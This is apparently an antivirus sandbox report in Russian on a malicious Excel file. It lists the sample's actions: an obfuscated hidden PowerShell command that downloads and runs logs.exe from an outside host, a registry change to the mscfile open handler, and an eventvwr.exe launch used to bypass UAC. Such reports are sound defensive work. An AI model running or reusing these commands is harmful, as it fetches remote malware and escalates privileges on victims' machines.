Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://cdn.dosya.web.tr/kp0wg8/logs.exe как %temp%\\akfhsjfsg.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowERshELl.Exe -WinDOWSTyle HiDdeN -NOpRofIlE -eXeCUtIoNpolICy Bypass (NEW-ObjEct SystEM.NeT.WEbCLiENT).DOWnloADFIlE('http://cdn.dosya.web.tr/Kp0wG8/logs.exe','%TEMP%\\AkfhsjFsg.exe') & reg ...
Изменения в файловой системе
Создает следующие файлы
- nul
- <Текущая директория>\1aae0000
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Сетевая активность
UDP
- DNS ASK cd#.##sya.web.tr
Другое
Запускает на исполнение
- '<SYSTEM32>\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\AkfhsjFsg.exe /f
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc" (со скрытым окном)
- '<SYSTEM32>\ping.exe' -n 15 127.0.0.1
- '<SYSTEM32>\cmd.exe' /c PowERshELl.Exe -WinDOWSTyle HiDdeN -NOpRofIlE -eXeCUtIoNpolICy Bypass (NEW-ObjEct SystEM.NeT.WEbCLiENT).DOWnloADFIlE('http://cdn.dosya.web.tr/Kp0wG8/logs.exe','%TEMP%\\AkfhsjFsg.exe') & reg ... (со скрытым окном)
